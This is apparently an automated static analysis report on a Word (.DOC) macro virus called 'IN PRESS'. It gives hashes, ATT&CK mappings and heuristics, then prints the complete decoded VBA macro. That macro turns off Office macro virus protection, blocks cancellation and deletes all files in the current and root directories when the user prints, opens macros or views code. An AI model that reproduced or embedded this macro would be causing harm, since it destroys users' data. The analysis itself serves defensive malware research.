Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 40b0db371fcec08e…

MALICIOUS

Office (OLE) / .DOC

Size: 28.0 KB
Created: 2002-03-16 17:20:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: 8bd541c09563b61ba632bc887bfdbfac
SHA-1: 4a098ac76122e255d675e7ec1a323577c1b14752
SHA-256: 40b0db371fcec08e332fe2d5216242dfc4ad407fce4291a37e6e76a4b36da930
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1490 Inhibit System Recovery

The sample contains a VBA macro that attempts to disable macro protection and delete files using `Kill("*.*")`. The macro also displays messages to the user, claiming to be a virus named 'IN PRESS'. This behavior indicates a destructive intent, aiming to cause data loss and disrupt the user's system.

Heuristics (2)

  • VBA macros detected (severity: medium, 1 related finding) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • VBA macro-virus self-replication / AV tampering (severity: critical) [OLE_VBA_MACRO_VIRUS_REPLICATION]
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                  Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)     1898 bytes
SHA-256 of macros.bas: 7f7eb68e0d8f6e58b16dfe181eece9f1ef31238fb83e989e4e39124822a21881

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "INPress"
Sub FilePrint()
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
On Errore GoTo ErrorFS

adoc = Dir("*.*")
While adoc <> ""
    Kill (adoc)
    MsgBox "' " + adoc + " ' has been erased !", vbInformation, "IN PRESS"
    adoc = Dir()
Wend
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "Ooops ! I have erased your documents .. I have to quit now . Bye bye and sweet dreams !!!"
    .Show
End With

Application.Quit

ErrorFS:

End Sub

Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    MsgBox "Sorry but you have been infected by IN PRESS !", vbInformation, "IN PRESS"
ErrorTM:

End Sub

Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "Why did you want to see my source ? You have done a bad thing !!"
    .Show
End With
Kill "\*.*"
Kill "*.*"

Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Virus IN PRESS"
    .Text = "I have erased your files to punish your!"
    .Show
End With

ErrorVVBC:
End Sub